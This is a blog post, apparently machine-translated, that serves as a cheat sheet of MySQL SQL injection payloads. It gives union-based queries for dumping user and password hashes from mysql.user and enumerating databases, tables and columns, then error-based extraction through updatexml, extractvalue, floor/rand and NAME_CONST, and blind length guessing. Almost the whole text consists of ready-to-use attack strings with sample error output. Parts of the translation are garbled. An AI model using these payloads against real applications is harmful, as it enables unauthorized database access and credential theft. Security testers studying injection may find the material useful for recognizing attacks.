Basic SQL Injection statements

Important System Parameters

@ Datadir data storage path @ basefir installation path @ group_concat_max_len GROUP_CONCAT function returns the maximum length @ version (5.5.23, etc.) @ version_comment version description (MySQL Community Server (GPL)) @ version_compile_ OS operating system version (win32, etc.) @ version_compile_machine operating system platform (x86, etc.) @ plugin_dir Plug-In Path

Obtain information using joint Query

Query Information

and 1=2 union select concat_ws(0x5f,user(),database(),@@version_comment,version())

Query database users

and 1=2 union select  GROUP_CONCAT(user,0x5f,password) from mysql.user

and 1=2 union select  GROUP_CONCAT(user,0x5f,password) from (select user,password from mysql.user)t

and 1=2 union select  GROUP_CONCAT(s) from (select concat_ws(0x5f,user,password)s from mysql.user)t

Query all databases (if there are multiple databases)

and 1=2  union select GROUP_CONCAT(schema_name) from information_schema.schemata

and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata)t

and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in ('information_schema','performance_schema'))t

and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in (0x696E666F726D6174696F6E5F736368656D61,0x706572666F726D616E63655F736368656D61))t

Query all table names

Note: The length of characters returned by GROUP_CONCAT is affected by the group_concat_max_len parameter. The database () location can be changed to the hexadecimal string (starting with 0x) of the database name)

and 1=2 union select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()

and 1=2 union select GROUP_CONCAT(table_name) from (select * from information_schema.tables where table_schema=database())t

Queries all column names in a specified table.

Note: The reason for database restriction is that the same name table may exist (in another database ).

and 1=2 union select GROUP_CONCAT(column_name) from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database()

and 1=2 union select GROUP_CONCAT(column_name) from (select * from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database())t

Use _ to split a record in admin.

Note: When the CONCAT function is spliced, if one of the field values is NULL, NULL is returned, while concat_ws does not, but any string whose field value is NULL is skipped.

and 1=2 union select concat(name,0x5F,password,0x5F) from admin limit 1and 1=2 union select concat_ws(0x5F,name,password) from admin limit 1

Concatenate all data in admin by commas (,) (use _ to separate each data entry in subquery)

and 1=2 union select GROUP_CONCAT(s) from (select concat_ws(0x5F,name,password)s from admin)t

Note: The preceding statement does not use the group by syntax, because all statements need to be returned. Comparison:

[and 1=2 union select name,GROUP_CONCAT(s) from (select name,concat_ws(0x5F,name,password)s from admin)t group by name limit 1,1]

You can also:

and 1=2  union select GROUP_CONCAT(name,0x5F,password) from admin

Note: The preceding statement does not use the group by syntax, because all statements need to be returned. Comparison:

[and 1=2  union select name,GROUP_CONCAT(name,0x5F,password) from admin group by name limit 1,1]

Number of fields to be guessed

and 1=2  union select 1.....and 1=2  union select 1,1,.....1,1

In this case, there are several 1 fields, indicating that there are several fields, and then a certain position is selected as the better display bit.

If union cannot be used, you can:

order by 10    successorder br 11    errorfields num:10

You can also:

group by 10    successgroup by 11    errorfields num:10

After the injection, the page displays:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

You can use the convert () function.

For example

and 1=2  union select convert(GROUP_CONCAT(name,0x5F,password) using latin1) from admin

It seems that the unhex (hex () method can be used.

and 1=2  union select unhex(hex(GROUP_CONCAT(name,0x5F,password))) from admin

Illegal mix of collations for operation 'UNION'

Use hex Functions

and 1=2  union select hex(GROUP_CONCAT(name,0x5F,password)) from admin

Check whether a table exists.

and 0<>(select count(*) from admin)

Number of tables to be guessed

and 0<(select count(*) from admin) okand 1<(select count(*) from admin) nonum:1

Guess the field name

and 1=(select count(*) from admin where length(name)>0)

Length of the field to be guessed

And 1 = (select count (*) from admin where length (name)> 6) error and 1 = (select count (*) from admin where length (name)> 5) the correct length is 6and 1 = (select count (*) from admin where length (name) = 6) Correct

Id = 1, where 1 contains single quotes. 'Not escaped)

'and 1 =2 union select concat_ws(0x5f,user,password) from mysql.user where user!='null

Finally:

select * from admin where id='1['and 1 =2 union select concat_ws(0x5f,user,password) from mysql.user where user!='null]'

Here [] is an injection statement.

Get information by error

1. Function error does not exist

sql:select * from t1 where id = a()injiect:a()error:#1305 - FUNCTION test.a does not exist

The database is test.

2. updatexml error 0x5c, 0x7e)

Note: This error can contain 32 characters.

sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select version()),0x7e),1)injiect:and updatexml(1,concat(0x7e,(select version()),0x7e),1)error:#1105 - XPATH syntax error: '~5.5.23~'

The database version is 5.5.23.

sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select GROUP_CONCAT(schema_name) from information_schema.schemata),0x7e),1)

Note: you can only see part of this method.

sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x5f,(select schema_name from information_schema.schemata limit 1,1),0x5f),1)

Note: No error is returned for this statement.

sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1)error:#1105 - XPATH syntax error: '~test~'

A database is named test

sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x74657374 LIMIT 0,1),0x7e),1)error:#1105 - XPATH syntax error: '~t1~'

A data table is t1

sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='t1' LIMIT 0,1),0x7e),1)error:#1105 - XPATH syntax error: '~id~'

A data field is id

sql:SELECT * FROM t1 WHERE id= 1  and updatexml(1,concat(0x7e,(select concat(name,0x3a,pass) from t1 limit 0,1),0x7e),1)error:#1105 - Character set 'ucs2' is not supported by XPATHsql:SELECT * FROM t1 WHERE id= 1  and updatexml(1,concat(0x7e,(select hex(concat(name,0x3a,pass)) from t1 limit 0,1),0x7e),1)

sql:SELECT * FROM t1 WHERE id= 1  and updatexml(1,concat(0x7e,(select concat(name) from t1 limit 0,1),0x7e),1)error:#1105 - XPATH syntax error: '~ad123~'

Data name field value ad123

3. Error reported through floor, Duplicate entry

sql:SELECT * FROM t1 WHERE id= 1   and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a)error:#1062 - Duplicate entry '5.5.231' for key 'group_key'

The database version is 5.5.231.

sql:SELECT * FROM t1 WHERE id= 1   and (select 1 from  (select count(*),concat(user(),floor(rand(0)*2))x from  information_schema.tables  group by x)a)error:#1062 - Duplicate entry 'test@localhost1' for key 'group_key'

The username is test @ localhost.

sql:SELECT * FROM t1 WHERE id= 1  and (select 1 from  (select count(*),concat((select concat(pass) from test.t2 where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

Replace the first concat parameter with a subquery. The Duplicate entry is not violent. Somehow.

Note: After careful analysis, the data obtained by the subquery must have a 'uniqueness 'attribute (not a unique value, based on the table structure), such as id primary key and name unique, pass does not have the primary key attribute. The error may be: id; name; concat (id); concat (id, name. however, pass, concat (pass), and concat (id, pass) are not reported.

4. extractvalue: 0x5c, 0x7e)

Note: The characters must be 32 characters long.

Obtain one table at a time.

SELECT * FROM t1 WHERE id= 1 and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables limit 0,1)));

Multiple tables are obtained each time (three tables here)

SELECT * FROM t1 WHERE id= 1 and extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables limit 0,3)));

5. Use NAME_CONST to inject mysql version> = 5.0.12)

Note: If the version is known> 5.1.35, other tests are not performed.) the following error occurs: Incorrect arguments to NAME_CONST. The parameter must be const.

SELECT * FROM t1 WHERE id= 1 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)

SELECT * FROM test.t1 WHERE id= 1 and 1=(select * from (select NAME_CONST((select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1),NAME_CONST((1),1)) as x)

Returns an error to get the column

Note: It seems that at least one field must be known.

SELECT * FROM test.t1 WHERE id= 1 and (select * from(select * from  test.t2 a join test.t2 b using(id,name))c);error:Duplicate column name 'pass'

Another field pass

SELECT * FROM test.t1 WHERE id= 1 and (select * from(select * from  test.t2 a join test.t2 b using(id,name,pass))c);

Another field, sta

This article is from the "lunnlew" blog, please be sure to keep this source http://lunnlew.blog.51cto.com/7622269/1297384